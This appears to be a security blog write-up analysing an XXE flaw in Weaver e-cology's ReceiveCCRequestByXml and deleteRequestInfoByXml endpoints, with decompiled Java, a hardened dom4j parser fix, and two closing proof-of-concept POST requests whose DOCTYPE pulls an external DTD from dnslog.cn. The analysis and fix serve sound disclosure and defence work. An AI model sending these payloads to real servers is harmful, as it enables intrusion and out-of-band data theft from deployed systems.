Weaver e-cology ReceiveCCRequestByXml XXE injection

Published 2023-08-04 00:29:13, author: uein

ReceiveCCRequestByXml.class

WEAVER\ecology\classbean\weaver\rest\servlet\service\ofs\ReceiveCCRequestByXml.class

public void service(IRestRequest var1, IRestResponse var2) throws RestException {
    // var3 holds the incoming HTTP request
    HttpServletRequest var3 = var1.getHttpRequest();
    Response var4 = new Response();
    // getServletInputStreamContent reads the body of var3 into a String and assigns it to var5
    String var5 = ServletUtil.getServletInputStreamContent(var3, "UTF-8");
    if (!"".equals(var5)) {
        OfsTodoDataManagerNew var6 = new OfsTodoDataManagerNew();
        String var7 = ServletUtil.getIpAddress(var3);
        var6.setClientIp(var7);
        // receiveCCRequestByXml processes var5
        String var8 = var6.receiveCCRequestByXml(var5);
        var4.addMessage("result", var8);
    }

    var2.writeReponse(var4);
}

Looking straight at the service method is enough: var3 is the HTTP request, getServletInputStreamContent converts the content of var3 into a String and assigns it to var5, and if var5 is not empty it is handed to the receiveCCRequestByXml method of OfsTodoDataManagerNew for processing.

getServletInputStreamContent

In short, getServletInputStreamContent converts var3 into a String, inserting a line separator wherever the input has a line break, and returns the result to var5.

receiveCCRequestByXml

Its first step is to call xmlToMap on the incoming var5.

xmlToMap

var1 = SecurityMethodUtil.clearEntity(var1); // a security check that filters the input

SecurityMethodUtil.clearEntity

    public static String clearEntity(String xml) {
        if (xml != null && !"".equals(xml)) {
            return xml.toLowerCase().indexOf("entity") == -1 ? xml : xml.replaceAll("(?i)\\<\\!entity", "*");
        } else {
            return xml;
        }
    }

If the incoming string is not empty, it is checked for "entity": if the string does not contain "entity" it is returned unchanged; if it does, replaceAll() replaces every <!ENTITY (matched case-insensitively) with *.

After this check, xmlToMap calls DocumentHelper.parseText:

Document var3 = DocumentHelper.parseText(var1);

So at this point org.dom4j.DocumentHelper.parseText parses the XML. Note that clearEntity only strips the literal <!ENTITY token: a DOCTYPE declaration that references an external DTD via SYSTEM passes through untouched, and parseText does not disable external entity resolution, which is exactly what the requests below rely on.
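The string filter above can be replaced by parser hardening. The following is an added example written for this post, not e-cology's own code: a hypothetical helper that parses untrusted XML with dom4j's SAXReader while refusing any DOCTYPE, so neither inline entity definitions nor external DTD fetches reach the parser. The sample bodies and the example.invalid host are constructed.

```java
import java.io.StringReader;
import org.dom4j.Document;
import org.dom4j.DocumentException;
import org.dom4j.io.SAXReader;
import org.xml.sax.SAXException;

public final class SafeXmlParser {

    // Hypothetical replacement for the DocumentHelper.parseText(var1) call in xmlToMap.
    public static Document parseUntrusted(String xml) throws DocumentException {
        SAXReader reader = new SAXReader();
        try {
            // Reject <!DOCTYPE ...> outright: this blocks both inline <!ENTITY>
            // declarations and SYSTEM/PUBLIC DTD references before any
            // string-level filter such as clearEntity() would be needed.
            reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            // Defence in depth for parser implementations that ignore the flag above.
            reader.setFeature("http://xml.org/sax/features/external-general-entities", false);
            reader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
            reader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        } catch (SAXException e) {
            throw new DocumentException("parser does not support the required secure XML features", e);
        }
        return reader.read(new StringReader(xml));
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample with the same shape as the request body discussed above,
        // pointing at a placeholder host; the hardened reader must reject it.
        String withDoctype = "<?xml version=\"1.0\"?>"
            + "<!DOCTYPE syscode SYSTEM \"http://example.invalid/x\">"
            + "<M><syscode>&send;</syscode></M>";
        try {
            parseUntrusted(withDoctype);
            System.out.println("unexpected: DOCTYPE was accepted");
        } catch (DocumentException e) {
            System.out.println("rejected as expected: " + e.getMessage());
        }

        // A plain document without a DOCTYPE still parses normally.
        Document ok = parseUntrusted("<M><syscode>abc</syscode></M>");
        System.out.println("parsed syscode = " + ok.getRootElement().elementText("syscode"));
    }
}
```

Rejecting the DOCTYPE at the parser is preferable to pattern-based filtering because it does not depend on guessing every spelling or encoding an attacker might use for an entity declaration.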

There is also deleteRequestInfoByXml, whose code is almost identical and which is likewise vulnerable to XXE; I won't go through it separately.

POC1

ReceiveCCRequestByXml

POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host: ip
Content-Type: application/xml
Content-Length: 133

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://dnslog.cn">
<M><syscode>&send;</syscode></M>

POC2

deleteRequestInfoByXml

POST /rest/ofs/deleteRequestInfoByXml HTTP/1.1
Host: ip
Content-Type: application/xml
Content-Length: 131

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://dnslog.cn/aa">
<M><syscode>&send;</syscode></M>